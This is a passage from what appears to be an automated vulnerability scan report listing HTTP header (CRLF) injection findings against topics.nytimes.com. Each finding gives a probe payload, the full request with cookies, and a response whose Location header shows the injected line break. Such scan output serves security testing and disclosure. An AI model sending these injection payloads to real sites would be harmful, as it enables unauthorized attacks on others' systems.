Location: http://topics.nytimes.com/top/news/international/countriesandterritories/4754f
05a44130f21
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.42. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/science/topics/globalwarming/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b9b2a%0d%0a6be4bca8bd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/b9b2a%0d%0a6be4bca8bd/science/topics/globalwarming/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:52 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/b9b2a
6be4bca8bd
/science/topics/globalwarming/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.43. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/science/topics/globalwarming/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload e5cd4%0d%0adb7fbdd22fb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/news/e5cd4%0d%0adb7fbdd22fb/topics/globalwarming/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:52 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/e5cd4
db7fbdd22fb
/topics/globalwarming/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.44. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/science/topics/globalwarming/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 93137%0d%0a300951b64e8 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/news/science/93137%0d%0a300951b64e8/globalwarming/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:53 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/science/93137
300951b64e8
/globalwarming/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.45. http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/science/topics/globalwarming/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload ffc0c%0d%0a5ed16640b46 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/news/science/topics/ffc0c%0d%0a5ed16640b46/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:53 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/science/topics/ffc0c
5ed16640b46
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.46. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/editorials/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9c216%0d%0aceb0867e582 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/9c216%0d%0aceb0867e582/editorialsandoped/editorials/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:39 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/9c216
ceb0867e582
/editorialsandoped/editorials/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.47. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/editorials/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 633c2%0d%0a634021120ae was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/633c2%0d%0a634021120ae/editorials/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/633c2
634021120ae
/editorials/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.48. http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/editorials/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 5b057%0d%0a7de59d5e87c was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/5b057%0d%0a7de59d5e87c/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:58:41 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/5b057
7de59d5e87c
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.49. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/letters/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 4f8b6%0d%0aedfd03c9e7d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/4f8b6%0d%0aedfd03c9e7d/editorialsandoped/letters/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:17 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/4f8b6
edfd03c9e7d
/editorialsandoped/letters/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.50. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/letters/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5ee1d%0d%0aff2ef789888 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/5ee1d%0d%0aff2ef789888/letters/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:17 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/5ee1d
ff2ef789888
/letters/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.51. http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/letters/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 37796%0d%0aa3f1fddc26a was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/37796%0d%0aa3f1fddc26a/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 03:01:17 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/37796
a3f1fddc26a
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.52. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/columnists/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 69187%0d%0a2bc25511dfe was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/69187%0d%0a2bc25511dfe/editorialsandoped/oped/columnists/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:36 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/69187
2bc25511dfe
/editorialsandoped/oped/columnists/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.53. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/columnists/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload dacbc%0d%0a30104000c6c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/dacbc%0d%0a30104000c6c/oped/columnists/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:36 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/dacbc
30104000c6c
/oped/columnists/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.54. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/columnists/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload f176e%0d%0a6d9076032fb was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/f176e%0d%0a6d9076032fb/columnists/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:36 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/f176e
6d9076032fb
/columnists/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.55. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/columnists/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 95d86%0d%0a19497670268 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/editorialsandoped/oped/95d86%0d%0a19497670268/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:37 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/opinion/editorialsandoped/oped/95d86
19497670268
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.56. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/columnists/paulkrugman/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload cdd86%0d%0a38aad6d8e1e was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/cdd86%0d%0a38aad6d8e1e/editorialsandoped/oped/columnists/paulkrugman/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:59:40 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/cdd86
38aad6d8e1e
/editorialsandoped/oped/columnists/paulkrugman/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.57. http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/opinion/editorialsandoped/oped/columnists/paulkrugman/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 8a68b%0d%0a66ffcb46ee5 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/opinion/8a68b%0d%0a66ffcb46ee5/oped/columnists/paulkrugman/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
